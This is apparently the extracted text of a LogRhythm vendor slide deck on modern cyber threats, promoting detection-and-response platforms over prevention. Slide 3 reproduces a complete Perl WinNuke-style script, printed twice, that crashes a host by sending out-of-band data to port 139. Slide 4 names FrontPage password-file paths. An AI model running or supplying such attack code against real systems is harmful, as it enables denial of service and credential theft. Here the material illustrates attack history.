1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm

2 | Company Confidential When Times Were Simpler

3 | Company Confidential Early Attacks #!/usr/bin/perl # use strict; use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S; #!/usr/bin/perl # use strict; use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;

4 | Company Confidential Early Attacks \_vti_pvt\ o Administrators.pwd o Authors.pwd

5 | Company Confidential Fast forward to 2015

6 | Company Confidential The Economist, November 2015 “Attackers will still get in…the only safe assumption is that your network is breached, and to make sure that you deal with intruders promptly—not after the 200-odd days which it typically takes. Many networks have no means of detecting a breach at all.”

7 | Company Confidential Attackers Are Getting In of surveyed firms were compromised by a successful cyber-attack in % “There are two kinds of big companies in the United States: those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.” – October 5, 2014 James Comey, Director FBI The CyberEdge Group, 2015 Cyberthreat Defense Report (1) Note 1. Survey includes 624 IT security professionals from North America and Europe representing organizations with more than 500 global employees

8 | Company Confidential The Expanding Cyber Threat Motive PoliticalIdeologicalCriminal

9 | Company Confidential Ever Increasing Cyber Risk Inappropriate Network Use Zero Day Attacks Credit Card Theft Compliance Violations Custom Malware Insider Threats MALWARE Phishing Breach INTRUSION Fraud State Sponsored Attacks Privilege Account Abuse spear phishing Denial of Service Compromised Endpoints BruteForcing Unintended Disclosure Trojan Horses MiTM Attacks Ransomware Payment Card Fraud Social Engineering Data Exfiltration Whaling Hijacking Keyloggers Source: PwC’s The Global State of Information Security Survey MILLION MILLION MILLION MILLION MILLION MILLION 66% Growth in Security Incidents

10 | Company Confidential Damaging Data Breaches

11 | Company Confidential Big Data Analytics can best detect these threats An Excellent Security Intelligence Platform Delivers: Big Data analytics to identify advanced threats Qualified and prioritized detection, reducing noise Incident response workflow orchestration and automation Capabilities to prevent high- impact breaches & damaging cyber incidents However, advanced threats: Require a broader view to recognize Only emerge over time Get lost in the noise Prevention-centric approaches can stop common threats A New Security Approach is Required

Prevention-Centric Approaches Firewalls Intrusion Prevention Systems Anti-Virus/Malware Sandboxing 205 Median number of days that companies were compromised before detection of threat - Mandiant M-Trends Median number of days that companies were compromised before detection of threat - Mandiant M-Trends 2015 Preventable Threats Previously Seen Signature-Based Static One-Dimensional Prevention-Centric Approaches are Insufficient Modern Cyber Threats Advanced Stealthy Persistent Dynamic Multi-Dimensional

13 | Company Confidential Prevention-Centric is Obsolete “Advanced targeted attacks make prevention-centric strategies obsolete. Securing enterprises in 2020 will require a shift to information and people-centric security strategies, combined with pervasive internal monitoring and sharing of security intelligence.” “By 2020, 60% of enterprise information security budgets will be allocated for rapid detection and response approaches up from less than 10% in 2013.” - Neil MacDonald,

14 | Company Confidential Faster Detection & Response Reduces Risk High VulnerabilityLow Vulnerability Months Days Hours Minutes Weeks MTTD & MTTR MEAN-TIME-TO-DETECT (MTTD) The average time it takes to recognize a threat requiring further analysis and response efforts MEAN-TIME-TO-RESPOND (MTTR) The average time it takes to respond and ultimately resolve the incident As organizations improve their ability to quickly detect and respond to threats, the risk of experiencing a damaging breach is greatly reduced Exposed to ThreatsResilient to Threats

15 | Company Confidential Data Exfiltration Can Be Avoided Advanced threats take their time and leverage the holistic attack surface Early neutralization = no damaging cyber incident or data breach Initial Compromise Command & Control Lateral Movement Target Attainment Exfiltration Corruption Disruption Reconnaissance ATTACK

16 | Company Confidential Vigilance Requires Visibility at Every Vector User Network Endpoint Holistic Attack Surface Endpoint User Network User Network User Endpoint User Network User Network Endpoint User Network Endpoint Network Endpoint User Network Endpoint User Network User

17 | Company Confidential Security Intelligence Platform TIME TO DETECT TIME TO RESPOND Recover Cleanup Report Review Adapt Neutralize Implement countermeasures to mitigate threat and associated risk Investigate Analyze threat to determine nature and extent of the incident Threat Lifecycle Management: End-to-End Detection & Response Workflow Qualify Assess threat to determine risk and whether full investigation is necessary Detect & Prioritize User Analytics Machine Analytics Collect & Generate Forensic Sensor Data Security Event Data Example Sources Log & Machine Data Example Sources

18 | Company Confidential Delivering a Path to Success Security Intelligence Maturity Levels Level 0: Blind Level 1: Minimally Complaint Level 2: Securely Compliant Level 3: Vigilant Level 4: Resilient MEAN-TIME-TO-DETECT (MTTD) MEAN-TIME-TO-RESPOND (MTTR) Greater threat resiliency is achieved at higher levels of security intelligence maturity Months Days Hours Minutes Weeks Timeframe Level 0Level 1Level 2Level 3Level 4 Exposed to ThreatsResilient to Threats

19 | Company Confidential Market Leadership Certifications & Validations Industry Awards Company Awards Company of the Year Industry Analysts

20 | Company Confidential THANK YOU